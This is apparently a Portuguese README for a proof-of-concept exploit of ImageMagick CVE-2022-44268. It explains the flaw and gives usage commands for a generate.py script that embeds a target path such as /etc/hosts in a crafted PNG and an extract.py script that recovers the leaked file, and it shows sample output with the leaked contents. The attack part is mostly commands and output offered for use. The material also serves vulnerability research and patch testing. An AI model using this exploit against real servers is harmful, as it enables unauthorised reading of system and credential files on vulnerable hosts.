
Gera arquivos PNG maliciosos para explorar a vulnerabilidade LFI do ImageMagick (CVE-2022-44268) para leitura arbitrária de arquivos, com script de extração para prova de conceito.
ImageMagick é um conjunto de software multiplataforma gratuito e de código aberto para exibir, converter e editar arquivos de imagem raster e vetorial. Ele pode ler e escrever mais de 200 formatos de arquivo de imagem. O ImageMagick é licenciado sob a Apache License 2.0. Está disponível na forma de ferramentas de linha de comando, bem como uma API C e um conjunto de classes C++. Wikipedia
ImageMagick versões 7.1.0-40 e anteriores são vulneráveis a uma vulnerabilidade de Inclusão de Arquivo Local. A vulnerabilidade se deve à validação inadequada da entrada fornecida pelo usuário. Um atacante pode explorar esta vulnerabilidade enviando um arquivo PNG manipulado ao alvo. A exploração bem-sucedida desta vulnerabilidade pode permitir que um atacante leia arquivos arbitrários no sistema alvo.
Crédito aos pesquisadores que descobriram isso:
Crie um PNG malicioso para aproveitar o ImageMagick 7.1.0-40:
pip install Pillow)Criando um PNG com generate.py:
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Isenção de responsabilidade: Seja bonzinho, por favor, não use para más ações.